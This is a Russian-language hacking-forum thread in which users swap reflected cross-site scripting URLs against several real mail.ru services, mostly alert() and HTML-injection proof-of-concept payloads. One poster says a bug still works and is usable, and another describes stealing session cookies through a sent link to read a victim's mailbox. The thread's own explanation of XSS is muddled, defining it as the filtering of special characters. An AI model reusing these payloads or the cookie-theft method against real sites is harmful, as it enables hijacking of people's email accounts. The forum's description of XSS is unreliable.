• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: mail.ru

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
XSS уязвимость на mail.ru
http://news.xss.pro/mail.gif
Найден XSS баг на mail.ru. Найден довольно давно, однако полностью работает на данный момент и есть возможность его использовать.

Код:
http://win.mail.ru/cgi-bin/sendmsgok?ReturnPath=] [script[alert(document.cookie); alert('Visit www.xss.pro/;)');[/script]

XSS - это фильтрация специальных символов во входном или выходном потоке. При этом традиционно фильтруются символы < >, а также " ' & %. Все эти символы имеют ASCII код меньший 128, и поэтому, в большинстве кодировок кодируются одним байтом, значение которого совпадает с ASCII-кодом символа.
 
SaTurN, privet, sobirai chemodani poedish v uchastok...
XSS уязвимость на mail.ru насчет етого, ето действительно старая бага, да ет так понты и ничего больще... ее незаюзаешь... :bang:
 
pcproman, почему же сразу не заюзаешь. Посылаешь мессагу с ссылкой, которая тырит кукисы, потом меняешь свои кукисы на чужие. И заходишь на мыло.ру. Пасс от мыла не узнаешь, зато почту почитаешь ;)

П.С. Помню раньше через альтернативное мыло можно было востановить ... :)
 
Новая XSS сервиса, даже 2:
Код:
http://go.mail.ru/urltracker?url=[XSS]

Код:
http://talk.mail.ru/article.html?ID=31836089&page=[XSS]
 
:help: :help: :help: Может это не в тему, но это про Mail.ru... захожу на мыло, жму ВХОДЯЩИЕ- кидает на авторизацию... и каждый раз на авторизацию... с авторизации на авторизацию... :bang: Че делать...??????? :cry2: :cry2: :cry2: :cry2: :cry2: :cry2: :cry2: :cry2: :cry2:
 
XSS на go.mail.ru
http://news.xss.pro/mail.gif
Новая XSS-уязвимость на go.mail.ru:

Код:
http://go.mail.ru/frame.html?imgurl=http://
http://xss.pro/index.htm&pageurl=http://xss.pro/
/index.htm&iid=aWAoanJ00EEJ&imgwidth=%3Cscript%3E
alert('www.xss.pro/')%3C/script%3E&imgheight=%3Cscript%3E
alert('www.xss.pro/')%3C/script%3E&imgsize=%3Cscript%3E
alert('www.xss.pro/')%3C/script%3E&images_links=%3Cscript%3E
alert('www.xss.pro/')%3C/script%3E

Источник: http://antisec.2x4.ru/advisories/mail.txt
Баг обнаружен: [.iNcluDe]
 
Вот собсно нашёл:

Код:
http://weather.mail.ru/?code="></a><h1>%D3%FF%E7%E2%E8%EC%EE%F1%F2%FC+%ED%E0%E9%E4%E5%ED%E0+Furius+Angel%60%EE%EC</h1><a%20href="1

:baby:
 
css :)
Часто люди сокращают Cross Site Scripting до CSS. Было очень много путаницы между Cascading Style Sheets (CSS) и cross site scripting. Некоторые люди из мира безопасности вместо Cross Site Scripting употр**ляют аббревиатуру XSS.
 
2mujik

Ржунимагу - не знает что такое CSS (в секьюрити значении), но заходит на такие форумы :D

А респекты будут? :)
 
Еще пара уязвимостей
Код:
http://weather.mail.ru/index.html?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru/?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22&curort_2=1
На самом деле их гораздо больше, просто неохота все сразу в паблик кидать
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх